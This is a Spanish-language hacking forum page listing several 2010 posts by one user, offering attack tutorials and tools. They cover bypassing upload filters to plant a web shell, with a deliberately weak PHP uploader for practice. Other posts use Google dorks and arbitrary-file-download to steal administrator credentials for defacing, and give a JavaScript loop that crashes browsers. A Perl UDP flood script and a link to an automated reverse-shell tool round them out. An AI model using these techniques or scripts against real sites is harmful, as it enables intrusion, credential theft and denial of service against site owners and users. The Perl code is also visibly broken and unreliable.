Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - SkillmaX

Páginas: [1]
1
Bugs y Exploits / Bypasseando uploaders con SkillmaX
« en: Julio 21, 2010, 07:02:02 pm »
He visto que muchos usuarios tienen problemas a la hora de bypassear los uploaders, en este tutorial os voy a enseñar
como saltarnoslo, y de todas las formas posibles, por si se nos muestran complicaciones, me he creado un upload en mi host, y por hay podreis practicar, a ver quién es el primero que lo consigue.


¿Qué es un upload?


Subir archivos, transmitir archivos o información desde el ordenador emisor al receptor (Web).


¿Como ver un upload?


Un upload se reconoce siempre, cuando entramos al panel de una web (Aunque a veces estan a fuera del panel), se suelen
reconocer cuando hay un boton "Examinar o otro nombre" que es donde se eligirá el archivo a subir, y otro botón, que es el
enviar (que será el botón que subirá nuestra shell o otro archivo al servidor), os dejo una imagen de como sería un upload
simple.





¿Qué tipos de bypasseamiento hay?


Actualmente hay unas cuantas formas de bypassear un uploader, yo las podria dar a entender así:


- Subida normal de un archivo php:


Le daríamos al botón examinar y desde hay cogeriamos nuestra shell, le dariamos al botón enviar, y subiriamos nuestra
shell al servidor, este metodo es el más facil que hay, ya que no hay que modificar nada, y es utilizable en algunas webs.


- Reenombrando con una imagen o archivo soportable:


Renombrando nuestra shell con una imagen que soporte el uploader, ya que muchas veces está reestringido para los archivos
php, o cualquier otro archivo, podemos probar a subir un archivo .jpg si se sube quiere decir que los archivos .jpg se pueden subir, para ello lo que haremos en nuestra shell sería renombrarlo shell.php a shell.php.jpg







Lo que haría es leer el .jpg primero y cuando esté subida lo que tendriamos que hacer es borra el .jpg y que quede el .php que es el archivo que nosotros queremos utilizar para que se ejecute la shell en el servidor.



- Modificando las cabeceras:


Esto es uno de lo que más se utiliza ya que los otros dos metodos que he explicado anteriormente puede fallar, entonces
casi siempre nos quedará el modificamiento de las cabeceras, esto trata de subir la shell con el nombre por ejemplo de
shell.jpg o shell.gif depende de el archivo que soporte el uploader.


Para hacer este metodo necesitamos mozilla y un addons que se llama HTTP Live Headers que lo pueden descargar de aqui:


Descargar aqui la última versión de mozilla

Descargar aqui el addons para firefox


Supongamos que hemos subido satisfactoriamente nuestra shell en .jpeg ahora tendriamos que modificar las cabeceras, que lo que consiste es cambiar .jpeg que es el archivo que hemos subido a .php que es el archivo que se va a ejecutar en el servidor.
Para eso cuando tengamos el archivo subido en jpeg, os saldrá el link para descargar cierto archivo por ejemplo.





Bueno, ya nos a subido la shell pero con .jpg ahora copiaremos la dirección, ojo, primero abrir el HTTP Live Header, que lo encontraremos arriba en la barra al lado de ayuda.





Ahora como bién he dicho antes, lo abrimos el http live header, copiamos la url, y lo abrimos y nos saldrá algo como esto.





Cuando esté abierto el HTTP live teneis que ir a la linea filename que será donde aparecerá nuestra shell subida en jpeg.
y pinchamos en lo alto de la linea, le damos a repetir y modificamos tal cual sale en la imagen de arriba, y renombramos en vez de .jpeg  a   .php, y se nos cargará la shell en la web.






- Subiendo shells en lenguaje como:


La otra manera que hay es subiendo la shell como en la primera forma que he explicado, pero esta vez con otros lenguajes que se ejecuten en la web, después de la php, la que yo más utilizo es la .asp o también la .pl


Para que practiquen


Como veo que quereis practicar la subida de shells os dejo un codigo de un upload que encontré por hay para que lo subais en vuestro servidor y probeis, y asin no fastidieis otras webs.

upload.html

Código: [Seleccionar]
<form action="subearchivo.php" method="post" enctype="multipart/form-data">
    <b>Campo de tipo texto:</b>
    <br>
    <input type="text" name="cadenatexto" size="20" maxlength="100">
    <input type="hidden" name="MAX_FILE_SIZE" value="100000">
    <br>
    <br>
    <b>Enviar un nuevo archivo: </b>
    <br>
    <input name="userfile" type="file">
    <br>
    <input type="submit" value="Enviar">
</form>


subearchivo.php

Código: [Seleccionar]
<?
//tomo el valor de un elemento de tipo texto del formulario
$cadenatexto = $_POST["cadenatexto"];
echo "Escribió en el campo de texto: " . $cadenatexto . "<br><br>";

//datos del arhivo
$nombre_archivo = $HTTP_POST_FILES['userfile']['name'];
$tipo_archivo = $HTTP_POST_FILES['userfile']['type'];
$tamano_archivo = $HTTP_POST_FILES['userfile']['size'];
//compruebo si las características del archivo son las que deseo
if (!((strpos($tipo_archivo, "gif") || strpos($tipo_archivo, "jpeg")) && ($tamano_archivo < 100000))) {
    echo "La extensión o el tamaño de los archivos no es correcta. <br><br><table><tr><td><li>Se permiten archivos .gif o .jpg<br><li>se permiten archivos de 100 Kb máximo.</td></tr></table>";
}else{
    if (move_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'], $nombre_archivo)){
       echo "El archivo ha sido cargado correctamente.";
    }else{
       echo "Ocurrió algún error al subir el fichero. No pudo guardarse.";
    }
}
?>

2
Bugs y Exploits / [TUTORIAL] Arbytrary downloader by SkillmaX
« en: Julio 12, 2010, 07:11:40 pm »



¿Qué es Arbytrary Download?


Arbytrary Dowload es una vulneabilidad utilizada por muchas personas dedicadas al defacing (Por ejemplo yo), consiste en la descarga de cualquier archivo del servidor, cosa que nosotros buscaremos el archivo, que contengan los usuarios y contraseñas de la misma web.



Dorks para Arbytrarys downloads


inurl: descargas.php
inurl: bajar.php
inurl: descarga.php



¿Como sabemos si una web es vulnerable a Arbytrary Download?


Pues no es dificil, miraremos la raiz de la web, y veremos algo como



Código: [Seleccionar]
www.ejemplo.com/download.php?file=

Download -> Es la carpeta del servidor
File -> Es donde se guardan todos los archivos de esa carpeta



Mirando el codigo nos podemos dar cuenta de lo peligroso que puede ser un Arbytrary download
al modo del programador, por que claro si yo miro el codigo y veo esto..



Código: [Seleccionar]
www.ejemplo.com/download.php?file=download.php

El archivo se descargará y veriamos todo el codigo de el download, que podria tener otro archivo dentro
que podría ser:


Código: [Seleccionar]
www.ejemplo.com/download.php?file=download.php/Otroarchivo.php

Entonces ahora nos quedaría finalizar la jugada como yo llamo, que sería encontrando los datos
finales de lo que queremos conseguir, que son los datos del administrador.


Ingresamos otra vez en la url por la que vamos que seria:



Código: [Seleccionar]
www.ejemplo.com/download.php?file=download.php/Otroarchivo.php

Se nos descargará el archivo "Otroarchivo.php" después miraremos su codigo para ver que otro
archivo puede haber en el codigo, yo siempre miro el codigo con Dreamveawer ya que es un buen
editor y creador de codigos a nivel diseño y a nivel programación.



Bueno ya hemos mirado el codigo y vemos que hay un ultimo archivo el que contiene nuestro beneficio a todo el trabajo que será el archivo:


Código: [Seleccionar]
www.ejemplo.com/download.php?file=download.php/Otroarchivo/password.php

Ahora nos descargariamos el archivo y lo abriremos con el Dreamveawer y tendría que salir
los datos del administrador o de los usuarios que nos llevarían a la base de datos por ejemplo:


Código: [Seleccionar]
usuario=UsuarioADMIN
Contraseña=tutorial
Nombredelabasededatos=Quevedo



Un saludo.

3
Bueno recien estaba codeando un poco el otro del smf 1.1.1 me decidí a hacer uno que
petara un poco el firefox hasta el desbordamiento de él mismo, funciona para todas las versiones.

Agradecimientos:

Sanlegas y Dr_HaCk93 por probarlo en sus pc's y darme el visto bueno
tambien doy a agradecer a poison (No el de está comunidad) por qué me basé en el suyo que es inservible y está fixeado, a este que está actualmente funcional.

# Exploit Title: FullMemory
# Author: SkillmaX
# Version: 3.6.6 inferiores y superiores
# Tested on: XP, vista, 7


Os dejo el codigo:

Código: [Seleccionar]
<body onLoad="javascript:SkillmaX();">

Caida de firefox - BUG

</body>


<!--

Desbordamiento del navegador

----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------

-->

<script>

<!-- -------------------------------------------------------- -->

function SkillmaX() {


<!-- -------------------------------------------------------- -->

var b = '\x04\x13\xE7\x9C\x00\x13\xE8\24\x42\x65\xEC\8C';



<!-- -------------------------------------------------------- -->


for (a =0;a<96584871252;a++) {


<!-- -------------------------------------------------------- -->

b+=b+'\x04\x13\xE7\x9C\x00\x13\xE8\24\x42\x65\xEC\8C';


<!-- -------------------------------------------------------- -->


document.write('<html><h3><h3><h3><marquee>'+b+b);

}

}

</script>


<!--

Desbordamiento del navegador

----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------

-->
<!--

Desbordamiento del navegador

----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------
----------------------------------------------------------

-->

<!-- -------------------------------------------------------- -->


Lo compilais como lala.html y lo subis a vuestro servidor, o mas facil ejecutarlo en vuestro PC
y vereis el desbordamiento como le a pasado a Dr_HaCk93, un saludo.

4
Perl / DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]
« en: Julio 04, 2010, 10:14:31 am »
Buenas, repasé un poco el tema del perl que hace muchiiisiimo que no lo tocaba, me dio
por reelerme el asunto de los socks, recordé las cosas y pude codearme esta herramienta en perl.

Caracteristicas:


+ Envio de 30000 socks
+ Mayor rapidéz en el envio
+ UDP


Descarga de el archivo compilado:


http://shup.com/Shup/376121/Doss.pl

Source utilizado por si alguien quiere modificarlo:

Código: Perl
  1. #!/usr/bin/perl
  2. =====================================================
  3.             DDoS en perl
  4.          Creado por SkillmaX
  5.          www.indetectables.net
  6.          www.hackingteam.org
  7.           www.ash-labs.org
  8.           www.level-23.org
  9.    
  10. =====================================================
  11. );
  12.  
  13. use io::socket;
  14.  
  15. print "Introduzca la IP: ";
  16. chop ($host = <stdin>);
  17. print "Introduzca el puerto: ";
  18. chop ($port = <stdin>);
  19.  
  20. {
  21. $sock = IO::Socket::INET->new (
  22. PeerAddr => $host,
  23. PeerPort => $port,
  24. Proto => 'udp') || die "$! Ha introducido algun dato incorrecto, vuelva a intentarlo";
  25. }
  26. packets:
  27. while (1) {
  28. $size = rand() * 30000 * 300000;
  29. print ("$host:$port Conexión enviada: $size\n");
  30. send($sock, 0, $size);
  31. }

5
Bugs y Exploits / WebRaider - Herramienta Automatica
« en: Julio 01, 2010, 08:56:33 am »
WebRaider es una herramienta para buscar y explotar vulnerabilidades de forma automatizada en aplicaciones web, que se centra en la explotación de las aplicaciones web.


La idea es simple, obtener una shell inversa o de una inyección de SQL y una petición sin necesidad de utilizar un canal extra como TFTP, FTP para subir la carga inicial.

Las características de esta herramienta son las siguientes:

* Realiza solo una solicitud, por lo tanto es mas rápido
* No es necesario ninguna herramienta, se puede simplemente utilizar el navegador o un sencillo proxy MITM
* Solo tienes que copiar y pegar el payload
* Es posible diseñar un ataque CSRF para que nos devuelva una shell inversa
* El payload no ocupa mas de 3500 caracteres
* No son necesarias aplicaciones del sistema como FTP, TFTP o Debug.exe
* Fácil de automatizar


Buena herramienta de nuestros amigos de dragonjar



http://code.google.com/p/webraider/downloads/list


Un saludo.

Páginas: [1]